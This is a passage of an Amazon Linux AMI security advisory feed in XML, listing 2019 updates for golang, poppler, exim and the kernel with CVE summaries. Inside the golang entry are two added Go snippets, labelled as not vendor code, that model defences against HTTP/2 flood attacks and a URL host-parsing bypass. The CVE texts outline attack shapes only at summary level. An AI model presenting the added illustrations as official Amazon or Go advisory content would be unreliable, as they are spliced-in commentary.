arch="x86_64"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.222.b10-0.47.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc-zip" version="1.8.0.222.b10" release="0.47.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-zip-1.8.0.222.b10-0.47.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.222.b10" release="0.47.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.222.b10-0.47.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.222.b10" release="0.47.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-1.8.0.222.b10-0.47.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.222.b10" release="0.47.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.222.b10-0.47.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.222.b10" release="0.47.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.222.b10-0.47.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.222.b10" release="0.47.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.222.b10-0.47.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.222.b10" release="0.47.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.222.b10-0.47.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.222.b10" release="0.47.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.222.b10-0.47.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1270</id><title>Amazon Linux AMI 2014.03 - 
ALAS-2019-1270: important priority package update for golang</title><issued date="2019-08-23 16:58:00" /><updated date="2019-10-02 23:03:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-9514:
Some HTTP/2 implementations are vulnerable to a reset flood, potentially leading to a denial of service. The attacker opens a number of streams and sends an invalid request over each stream that should solicit a stream of RST_STREAM frames from the peer. Depending on how the peer queues the RST_STREAM frames, this can consume excess memory, CPU, or both.
1735744:
CVE-2019-9514 HTTP/2: flood using HEADERS frames results in unbounded memory growth
CVE-2019-9512:
Some HTTP/2 implementations are vulnerable to ping floods, potentially leading to a denial of service. The attacker sends continual pings to an HTTP/2 peer, causing the peer to build an internal queue of responses. Depending on how efficiently this data is queued, this can consume excess CPU, memory, or both.
1735645:
CVE-2019-9512 HTTP/2: flood using PING frames results in unbounded memory growth
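Both CVE-2019-9514 and CVE-2019-9512 come down to the same shape: every inbound PING or invalid request obliges the server to queue a reply (a PING ack or an RST_STREAM), and a peer that never reads its side of the connection makes that queue grow without bound. The mitigation is to cap the number of queued control frames and close the connection when the cap is exceeded. The following is an added illustration of that cap and is not code from the advisory, from Go, or from any Amazon package; it is a self-contained model, not a real HTTP/2 framer, and the cap value of 10000 is an assumption taken from the Go http2 server fix rather than a tuned figure:

```go
package main

import (
	"errors"
	"fmt"
)

// maxQueuedControlFrames caps the control frames (PING acks, RST_STREAM,
// SETTINGS acks) a server will hold for a peer that is not reading its side
// of the connection. Assumption: 10000 is the bound used by the Go http2
// server fix for these CVEs; it is not a measured or tuned value.
const maxQueuedControlFrames = 10000

// ErrControlFrameFlood is returned once the queue exceeds the cap; the right
// reaction is to close the connection rather than keep buffering.
var ErrControlFrameFlood = errors.New("http2: too many queued control frames, closing connection")

type frameKind int

const (
	framePing frameKind = iota
	frameHeaders
	frameRSTStream
)

// conn models the server side of one HTTP/2 connection: how many replies are
// queued for the transport but not yet written.
type conn struct {
	queuedControl int
	closeErr      error
}

// onFrame handles one inbound frame. A PING solicits a PING ack and an
// invalid HEADERS solicits an RST_STREAM, both of which are queued; the
// queue depth is then checked against the cap. Inbound RST_STREAM needs no
// reply, so it never grows the queue.
func (c *conn) onFrame(k frameKind, invalidRequest bool) error {
	if c.closeErr != nil {
		return c.closeErr
	}
	switch k {
	case framePing:
		c.queuedControl++
	case frameHeaders:
		if invalidRequest {
			c.queuedControl++
		}
	case frameRSTStream:
		// nothing to send back
	}
	if c.queuedControl > maxQueuedControlFrames {
		c.closeErr = ErrControlFrameFlood
		return c.closeErr
	}
	return nil
}

// onWritten is the transport's notification that n queued control frames
// were flushed to the peer, which is the only thing that shrinks the queue.
func (c *conn) onWritten(n int) {
	c.queuedControl -= n
	if c.queuedControl > 0 {
		return
	}
	c.queuedControl = 0 // clamp: the transport cannot flush more than was queued
}

// simulateFlood models a peer that sends n PINGs (or n invalid requests when
// resetFlood is true) and never reads the replies. It returns how many frames
// the server accepted before it closed the connection.
func simulateFlood(n int, resetFlood bool) (accepted int, err error) {
	c := new(conn)
	kind := framePing
	if resetFlood {
		kind = frameHeaders
	}
	for i := 0; i != n; i++ {
		if err = c.onFrame(kind, resetFlood); err != nil {
			return accepted, err
		}
		accepted++
	}
	return accepted, nil
}

// simulateHealthy models a peer that drains each reply as it is sent; the
// queue never grows and the cap is never hit, however many PINGs arrive.
func simulateHealthy(n int) error {
	c := new(conn)
	for i := 0; i != n; i++ {
		if err := c.onFrame(framePing, false); err != nil {
			return err
		}
		c.onWritten(1)
	}
	return nil
}

func main() {
	n, err := simulateFlood(50000, false)
	fmt.Printf("ping flood: accepted %d frames, then: %v\n", n, err)
	n, err = simulateFlood(50000, true)
	fmt.Printf("reset flood: accepted %d frames, then: %v\n", n, err)
	fmt.Printf("well-behaved peer: %v\n", simulateHealthy(50000))
}
```

The point of the model is the asymmetry it makes visible: a well-behaved peer can send any number of PINGs because each reply is drained, while a peer that stops reading is cut off after a fixed, memory-bounded number of queued replies instead of being allowed to grow the server's heap.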
CVE-2019-14809:
net/url in Go before 1.11.13 and 1.12.x before 1.12.8 mishandles malformed hosts in URLs, leading to an authorization bypass in some applications. This is related to a Host field with a suffix appearing in neither Hostname() nor Port(), and is related to a non-numeric port number. For example, an attacker can compose a crafted javascript:// URL that results in a hostname of google.com.
1743129:
CVE-2019-14809 golang: malformed hosts in URLs leads to authorization bypass
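The authorization bypass in CVE-2019-14809 arises when an application allowlists the value of Hostname() while the client actually connects to the raw Host, and the two disagree because the parser kept bytes that neither Hostname() nor Port() reports. A defensive check, independent of the fix in Go 1.12.8, is to rebuild Host from the two accessors and refuse any URL where the rebuilt value is not byte-for-byte the original. The following is an added example and is not code from the advisory, from Go, or from any Amazon package; the allowlist hostPolicy and the sample URLs are constructed for illustration:

```go
package main

import (
	"errors"
	"fmt"
	"net/url"
	"strconv"
	"strings"
)

// ErrHostMismatch signals that Hostname() and Port() together do not
// reconstruct the raw Host: the parser kept bytes that neither accessor
// reports, which is the shape of the CVE-2019-14809 bypass.
var ErrHostMismatch = errors.New("url: Host does not round-trip through Hostname()/Port()")

// hostPolicy is a constructed allowlist standing in for whatever
// authorization decision an application makes on the hostname.
var hostPolicy = map[string]bool{"example.com": true}

// checkURLHost parses rawURL and returns the hostname only if the host the
// application would authorize (Hostname) plus the port is byte-for-byte the
// host a client would actually connect to (Host). IPv6 zone identifiers are
// rejected as a side effect, since Hostname() unescapes them.
func checkURLHost(rawURL string) (string, error) {
	u, err := url.Parse(rawURL)
	if err != nil {
		return "", err // Go 1.12.8 and later already reject non-numeric ports here
	}
	host, port := u.Hostname(), u.Port()
	if port != "" {
		if _, perr := strconv.ParseUint(port, 10, 16); perr != nil {
			return "", fmt.Errorf("url: non-numeric port %q", port)
		}
	}
	rebuilt := host
	if strings.Contains(host, ":") {
		rebuilt = "[" + host + "]" // an IPv6 literal keeps its brackets in Host
	}
	if port != "" {
		rebuilt += ":" + port
	}
	if rebuilt != u.Host {
		return "", ErrHostMismatch
	}
	return host, nil
}

// allowedByPolicy is the authorization decision: it consults the allowlist
// only with a hostname that passed the round-trip check.
func allowedByPolicy(rawURL string) bool {
	host, err := checkURLHost(rawURL)
	if err != nil {
		return false
	}
	return hostPolicy[host]
}

func main() {
	// Constructed inputs: two well-formed URLs, a non-numeric port, and a
	// dangling colon that url.Parse accepts but the accessors silently drop.
	for _, raw := range []string{
		"http://example.com:8080/path",
		"http://[::1]:443/",
		"http://example.com:abc/",
		"http://example.com:/",
	} {
		host, err := checkURLHost(raw)
		fmt.Printf("%-30s host=%q err=%v\n", raw, host, err)
	}
}
```

On a patched Go the non-numeric port is rejected by url.Parse itself; the dangling-colon case shows why the round-trip check is still worth keeping, since url.Parse accepts "example.com:" as a Host while Hostname() and Port() return "example.com" and "", so an allowlist keyed on Hostname() would be judging a different string from the one a client dials.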
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14809" title="" id="CVE-2019-14809" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9512" title="" id="CVE-2019-9512" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9514" title="" id="CVE-2019-9514" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="golang-race" version="1.12.8" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-race-1.12.8-1.51.amzn1.x86_64.rpm</filename></package><package name="golang-src" version="1.12.8" release="1.51.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-src-1.12.8-1.51.amzn1.noarch.rpm</filename></package><package name="golang-tests" version="1.12.8" release="1.51.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-tests-1.12.8-1.51.amzn1.noarch.rpm</filename></package><package name="golang-bin" version="1.12.8" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-bin-1.12.8-1.51.amzn1.x86_64.rpm</filename></package><package name="golang-docs" version="1.12.8" release="1.51.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-docs-1.12.8-1.51.amzn1.noarch.rpm</filename></package><package name="golang-misc" version="1.12.8" release="1.51.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-misc-1.12.8-1.51.amzn1.noarch.rpm</filename></package><package name="golang" version="1.12.8" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-1.12.8-1.51.amzn1.x86_64.rpm</filename></package><package name="golang" version="1.12.8" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/golang-1.12.8-1.51.amzn1.i686.rpm</filename></package><package name="golang-bin" version="1.12.8" release="1.51.amzn1" epoch="0" 
arch="i686"><filename>Packages/golang-bin-1.12.8-1.51.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1271</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1271: medium priority package update for poppler</title><issued date="2019-08-23 17:01:00" /><updated date="2019-08-26 22:23:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-9631:
Poppler 0.74.0 has a heap-based buffer over-read in the CairoRescaleBox.cc downsample_row_box_filter function.
1686802:
CVE-2019-9631 poppler: heap-based buffer over-read in function downsample_row_box_filter in CairoRescaleBox.cc
CVE-2019-9200:
A heap-based buffer underwrite exists in ImageStream::getLine() located at Stream.cc in Poppler 0.74.0 that can (for example) be triggered by sending a crafted PDF file to the pdfimages binary. It allows an attacker to cause Denial of Service (Segmentation fault) or possibly have unspecified other impact.
1683632:
CVE-2019-9200 poppler: heap-based buffer overflow in function ImageStream::getLine() in Stream.cc
CVE-2019-7310:
In Poppler 0.73.0, a heap-based buffer over-read (due to an integer signedness error in the XRef::getEntry function in XRef.cc) allows remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact via a crafted PDF document, as demonstrated by pdftocairo.
1672419:
CVE-2019-7310 poppler: heap-based buffer over-read in XRef::getEntry in XRef.cc
CVE-2018-20662:
In Poppler 0.72.0, PDFDoc::setup in PDFDoc.cc allows attackers to cause a denial-of-service (application crash caused by Object.h SIGABRT, because of a wrong return value from PDFDoc::setup) by crafting a PDF file in which an xref data structure is mishandled during extractPDFSubtype processing.
1665273:
CVE-2018-20662 poppler: SIGABRT PDFDoc::setup class in PDFDoc.cc
CVE-2018-20650:
A reachable Object::dictLookup assertion in Poppler 0.72.0 allows attackers to cause a denial of service due to the lack of a check for the dict data type, as demonstrated by use of the FileSpec class (in FileSpec.cc) in pdfdetach.
1665263:
CVE-2018-20650 poppler: reachable Object::dictLookup assertion in FileSpec class in FileSpec.cc
CVE-2018-20481:
XRef::getEntry in XRef.cc in Poppler 0.72.0 mishandles unallocated XRef entries, which allows remote attackers to cause a denial of service (NULL pointer dereference) via a crafted PDF document, when XRefEntry::setFlag in XRef.h is called from Parser::makeStream in Parser.cc.
1665266:
CVE-2018-20481 poppler: NULL pointer dereference in the XRef::getEntry in XRef.cc
CVE-2018-19149:
Poppler before 0.70.0 has a NULL pointer dereference in _poppler_attachment_new when called from poppler_annot_file_attachment_get_attachment.
1649457:
CVE-2018-19149 poppler: NULL pointer dereference in _poppler_attachment_new
CVE-2018-19060:
An issue was discovered in Poppler 0.71.0. There is a NULL pointer dereference in goo/GooString.h that will lead to denial of service, as demonstrated by utils/pdfdetach.cc not validating the filename of an embedded file before constructing a save path.
1649450:
CVE-2018-19060 poppler: pdfdetach utility does not validate save paths
CVE-2018-19059:
An issue was discovered in Poppler 0.71.0. There is an out-of-bounds read in EmbFile::save2 in FileSpec.cc that will lead to denial of service, as demonstrated by utils/pdfdetach.cc not validating embedded files before save attempts.
1649440:
CVE-2018-19059 poppler: out-of-bounds read in EmbFile::save2 in FileSpec.cc
CVE-2018-19058:
An issue was discovered in Poppler 0.71.0. There is a reachable abort in Object.h that will lead to denial of service, because EmbFile::save2 in FileSpec.cc lacks a stream check before saving an embedded file.
1649435:
CVE-2018-19058 poppler: reachable abort in Object.h
CVE-2018-18897:
An issue was discovered in Poppler 0.71.0. There is a memory leak in GfxColorSpace::setDisplayProfile in GfxState.cc, as demonstrated by pdftocairo.
1646546:
CVE-2018-18897 poppler: memory leak in GfxColorSpace::setDisplayProfile in GfxState.cc
CVE-2018-16646:
In Poppler 0.68.0, the Parser::getObj() function in Parser.cc may cause infinite recursion via a crafted file. A remote attacker can leverage this for a DoS attack.
1626618:
CVE-2018-16646 poppler: infinite recursion in Parser::getObj function in Parser.cc
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16646" title="" id="CVE-2018-16646" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18897" title="" id="CVE-2018-18897" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19058" title="" id="CVE-2018-19058" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19059" title="" id="CVE-2018-19059" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19060" title="" id="CVE-2018-19060" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19149" title="" id="CVE-2018-19149" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20481" title="" id="CVE-2018-20481" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20650" title="" id="CVE-2018-20650" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20662" title="" id="CVE-2018-20662" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7310" title="" id="CVE-2019-7310" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9200" title="" id="CVE-2019-9200" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9631" title="" id="CVE-2019-9631" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="poppler-cpp" version="0.26.5" release="38.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-cpp-0.26.5-38.19.amzn1.x86_64.rpm</filename></package><package name="poppler" version="0.26.5" release="38.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-0.26.5-38.19.amzn1.x86_64.rpm</filename></package><package name="poppler-cpp-devel" version="0.26.5" release="38.19.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/poppler-cpp-devel-0.26.5-38.19.amzn1.x86_64.rpm</filename></package><package name="poppler-debuginfo" version="0.26.5" release="38.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-debuginfo-0.26.5-38.19.amzn1.x86_64.rpm</filename></package><package name="poppler-utils" version="0.26.5" release="38.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-utils-0.26.5-38.19.amzn1.x86_64.rpm</filename></package><package name="poppler-devel" version="0.26.5" release="38.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-devel-0.26.5-38.19.amzn1.x86_64.rpm</filename></package><package name="poppler-glib-devel" version="0.26.5" release="38.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-glib-devel-0.26.5-38.19.amzn1.x86_64.rpm</filename></package><package name="poppler-glib" version="0.26.5" release="38.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-glib-0.26.5-38.19.amzn1.x86_64.rpm</filename></package><package name="poppler-devel" version="0.26.5" release="38.19.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-devel-0.26.5-38.19.amzn1.i686.rpm</filename></package><package name="poppler-glib-devel" version="0.26.5" release="38.19.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-glib-devel-0.26.5-38.19.amzn1.i686.rpm</filename></package><package name="poppler-cpp-devel" version="0.26.5" release="38.19.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-cpp-devel-0.26.5-38.19.amzn1.i686.rpm</filename></package><package name="poppler" version="0.26.5" release="38.19.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-0.26.5-38.19.amzn1.i686.rpm</filename></package><package name="poppler-utils" version="0.26.5" release="38.19.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-utils-0.26.5-38.19.amzn1.i686.rpm</filename></package><package name="poppler-glib" version="0.26.5" release="38.19.amzn1" epoch="0" 
arch="i686"><filename>Packages/poppler-glib-0.26.5-38.19.amzn1.i686.rpm</filename></package><package name="poppler-debuginfo" version="0.26.5" release="38.19.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-debuginfo-0.26.5-38.19.amzn1.i686.rpm</filename></package><package name="poppler-cpp" version="0.26.5" release="38.19.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-cpp-0.26.5-38.19.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1277</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1277: critical priority package update for exim</title><issued date="2019-09-08 22:54:00" /><updated date="2019-09-09 20:58:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-15846:
Exim before 4.92.2 allows remote attackers to execute arbitrary code as root via a trailing backslash.
1748397:
CVE-2019-15846 exim: out-of-bounds access in string_interpret_escape() leading to buffer overflow in the SMTP delivery process
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15846" title="" id="CVE-2019-15846" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="exim-pgsql" version="4.92" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-pgsql-4.92-1.24.amzn1.x86_64.rpm</filename></package><package name="exim-mysql" version="4.92" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-mysql-4.92-1.24.amzn1.x86_64.rpm</filename></package><package name="exim-mon" version="4.92" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-mon-4.92-1.24.amzn1.x86_64.rpm</filename></package><package name="exim-greylist" version="4.92" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-greylist-4.92-1.24.amzn1.x86_64.rpm</filename></package><package name="exim-debuginfo" version="4.92" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-debuginfo-4.92-1.24.amzn1.x86_64.rpm</filename></package><package name="exim" version="4.92" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-4.92-1.24.amzn1.x86_64.rpm</filename></package><package name="exim-greylist" version="4.92" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/exim-greylist-4.92-1.24.amzn1.i686.rpm</filename></package><package name="exim-pgsql" version="4.92" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/exim-pgsql-4.92-1.24.amzn1.i686.rpm</filename></package><package name="exim-mon" version="4.92" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/exim-mon-4.92-1.24.amzn1.i686.rpm</filename></package><package name="exim" version="4.92" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/exim-4.92-1.24.amzn1.i686.rpm</filename></package><package name="exim-debuginfo" version="4.92" release="1.24.amzn1" epoch="0" 
arch="i686"><filename>Packages/exim-debuginfo-4.92-1.24.amzn1.i686.rpm</filename></package><package name="exim-mysql" version="4.92" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/exim-mysql-4.92-1.24.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1278</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1278: low priority package update for kernel</title><issued date="2019-09-13 22:43:00" /><updated date="2019-09-18 21:24:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-9516:
A flaw was found in the Linux kernel in the hid_debug_events_read() function in the drivers/hid/hid-debug.c file. A lack of certain checks may result in a userspace buffer overflow, an out-of-bounds write, or an infinite loop.
A flaw was found in the Linux kernel in the hid_debug_events_read() function in the drivers/hid/hid-debug.c file. A lack of certain checks may allow a privileged user (&quot;root&quot;) to achieve an out-of-bounds write and thus corrupt a user space buffer.
1631036:
CVE-2018-9516 kernel: HID: debug: Buffer overflow in hid_debug_events_read() in drivers/hid/hid-debug.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9516" title="" id="CVE-2018-9516" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel" version="4.14.55" release="62.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.55-62.37.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.55" release="62.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.55-62.37.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.55" release="62.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.55-62.37.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.55" release="62.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.55-62.37.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.55" release="62.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.55-62.37.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.55" release="62.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.55-62.37.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.55" release="62.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.55-62.37.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.55" release="62.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.55-62.37.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.55" release="62.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.55-62.37.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.55" release="62.37.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/kernel-headers-4.14.55-62.37.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.55" release="62.37.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.55-62.37.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.55" release="62.37.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.55-62.37.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.55" release="62.37.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.55-62.37.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.55" release="62.37.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.55-62.37.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.55" release="62.37.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.55-62.37.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.55" release="62.37.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.55-62.37.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.55" release="62.37.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.55-62.37.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.55" release="62.37.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.55-62.37.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.55" release="62.37.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.55-62.37.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.55" release="62.37.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.55-62.37.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" 
from="linux-security@amazon.com"><id>ALAS-2019-1279</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1279: low priority package update for kernel</title><issued date="2019-09-13 22:43:00" /><updated date="2019-09-18 21:25:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-7755:
An issue was discovered in the fd_locked_ioctl function in drivers/block/floppy.c in the Linux kernel. The floppy driver will copy a kernel pointer to user memory in response to the FDGETPRM ioctl. An attacker can send the FDGETPRM ioctl and use the obtained kernel pointer to discover the location of kernel code and data and bypass kernel security protections such as KASLR.
1553216:
CVE-2018-7755 kernel: Information exposure in fd_locked_ioctl function in drivers/block/floppy.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7755" title="" id="CVE-2018-7755" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-devel" version="4.14.77" release="69.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.77-69.57.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.77" release="69.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.77-69.57.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.77" release="69.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.77-69.57.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.77" release="69.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.77-69.57.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.77" release="69.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.77-69.57.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.77" release="69.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.77-69.57.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.77" release="69.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.77-69.57.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.77" release="69.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.77-69.57.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.77" release="69.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.77-69.57.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.77" release="69.57.amzn1" epoch="0" 
